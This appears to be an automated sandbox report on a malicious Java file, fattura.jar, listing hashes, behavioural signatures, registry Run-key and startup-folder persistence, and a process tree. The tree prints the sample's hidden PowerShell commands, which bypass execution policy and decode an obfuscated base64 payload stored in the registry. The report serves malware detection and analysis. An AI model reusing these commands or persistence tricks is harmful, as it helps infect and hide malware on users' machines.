Analysis
max time kernel: 149s
max time network: 156s
platform: windows7_x64
resource: win7v200430
submitted: 29-06-2020 18:10
Static task: static1
Behavioral task: behavioral1
  Sample: fattura.jar
  Resource: win7v200430 (windows7_x64)
  0 signatures, 0 seconds
Behavioral task: behavioral2
  Sample: fattura.jar
  Resource: win10v200430 (windows10_x64)
  0 signatures, 0 seconds
General
Target: fattura.jar
Size: 222KB
MD5: 9f4c61b914d5174226a6591f9e9a2a48
SHA1: 558fa0ea8e2ea1c3c6b618789a88081eebeeab4c
SHA256: eb76c8ea9c1857530e537b318eeac0781f7bbc68ad9e0152bcb2db5a8af71d97
SHA512: f433da3b79fdd9f135094fc546988f81f535793a01b3b73803d7ed5f9b6e6eaacc685ee50e73ff7e3c066deeab7208ff64b55e7a5bc704966f8820b6a8dd81fc
Score: 8/10
Malware Config
Signatures
Suspicious use of WriteProcessMemory (21 IoCs)
Processes: java.exe, wscript.exe, cmd.exe, WScript.exe
description | pid | process | target process
PID 676 wrote to memory of 1036 | 676 | java.exe | wscript.exe (logged 3 times)
PID 1036 wrote to memory of 1376 | 1036 | wscript.exe | powershell.exe (logged 3 times)
PID 1036 wrote to memory of 1828 | 1036 | wscript.exe | WScript.exe (logged 3 times)
PID 1036 wrote to memory of 1848 | 1036 | wscript.exe | cmd.exe (logged 3 times)
PID 1848 wrote to memory of 1892 | 1848 | cmd.exe | javaw.exe (logged 3 times)
PID 1036 wrote to memory of 468 | 1036 | wscript.exe | javaw.exe (logged 3 times)
PID 1828 wrote to memory of 1580 | 1828 | WScript.exe | powershell.exe (logged 3 times)
Suspicious use of AdjustPrivilegeToken (2 IoCs)
Processes: powershell.exe, powershell.exe
description | pid | process
Token: SeDebugPrivilege | 1376 | powershell.exe
Token: SeDebugPrivilege | 1580 | powershell.exe
Suspicious behavior: EnumeratesProcesses (4 IoCs)
Processes: powershell.exe, powershell.exe
pid | process
1376 | powershell.exe (logged 2 times)
1580 | powershell.exe (logged 2 times)
Blacklisted process makes network request (25 IoCs)
Processes: WScript.exe
flow | pid | process
4, 5, 8, 10, 11, 12, 14, 15, 16, 18, 19, 20, 22, 23, 24, 26, 27, 28, 30, 31, 32, 34, 35, 36, 38 | 1828 | WScript.exe (one row per flow, 25 flows)
Suspicious behavior: GetForegroundWindowSpam (1 IoC)
Processes: javaw.exe
pid | process
468 | javaw.exe
Adds Run entry to start application (2 TTPs, 6 IoCs)
Processes: WScript.exe, wscript.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run\tDHMhQUaqL = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\tDHMhQUaqL.vbs\"" | WScript.exe
Key created | \REGISTRY\MACHINE\software\microsoft\windows\currentversion\run | WScript.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\tDHMhQUaqL = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\tDHMhQUaqL.vbs\"" | WScript.exe
Key created | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run | wscript.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Software\Microsoft\Windows\CurrentVersion\Run\ntfsmgr = "\"C:\\Program Files\\Java\\jre7\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\AppData\\Roaming\\ntfsmgr.jar\"" | wscript.exe
Key created | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\software\microsoft\windows\currentversion\run | WScript.exe
Drops startup file (2 IoCs)
Processes: WScript.exe
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tDHMhQUaqL.vbs | WScript.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\tDHMhQUaqL.vbs | WScript.exe
Processes (tree; indentation shows parent/child depth)
C:\Windows\system32\java.exe
  java -jar C:\Users\Admin\AppData\Local\Temp\fattura.jar
  - Suspicious use of WriteProcessMemory
    C:\Windows\system32\wscript.exe
      wscript C:\Users\Admin\bjzxzjbyqj.vbs
      - Suspicious use of WriteProcessMemory
      - Adds Run entry to start application
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!&','m');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious behavior: EnumeratesProcesses
        C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\tDHMhQUaqL.vbs"
          - Suspicious use of WriteProcessMemory
          - Blacklisted process makes network request
          - Adds Run entry to start application
          - Drops startup file
            C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!&','A');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
              - Suspicious use of AdjustPrivilegeToken
              - Suspicious behavior: EnumeratesProcesses
        C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre7\bin\javaw.exe" -version 2> C:\Users\Admin\AppData\Local\Temp\output.txt
          - Suspicious use of WriteProcessMemory
            C:\Program Files\Java\jre7\bin\javaw.exe
              "C:\Program Files\Java\jre7\bin\javaw.exe" -version
        C:\Program Files\Java\jre7\bin\javaw.exe
          "C:\Program Files\Java\jre7\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\ntfsmgr.jar"
          - Suspicious behavior: GetForegroundWindowSpam
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex
- C:\Users\Admin\AppData\Local\Temp\output.txt
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
- C:\Users\Admin\AppData\Roaming\ntfsmgr.jar
- C:\Users\Admin\AppData\Roaming\tDHMhQUaqL.vbs
- C:\Users\Admin\bjzxzjbyqj.vbs
- memory/468-10-0x0000000000000000-mapping.dmp
- memory/1036-1-0x0000000000000000-mapping.dmp
- memory/1036-13-0x0000000002660000-0x0000000002664000-memory.dmp (filesize 16KB)
- memory/1376-3-0x0000000000000000-mapping.dmp
- memory/1580-14-0x0000000000000000-mapping.dmp
- memory/1828-4-0x0000000000000000-mapping.dmp
- memory/1848-6-0x0000000000000000-mapping.dmp
- memory/1892-7-0x0000000000000000-mapping.dmp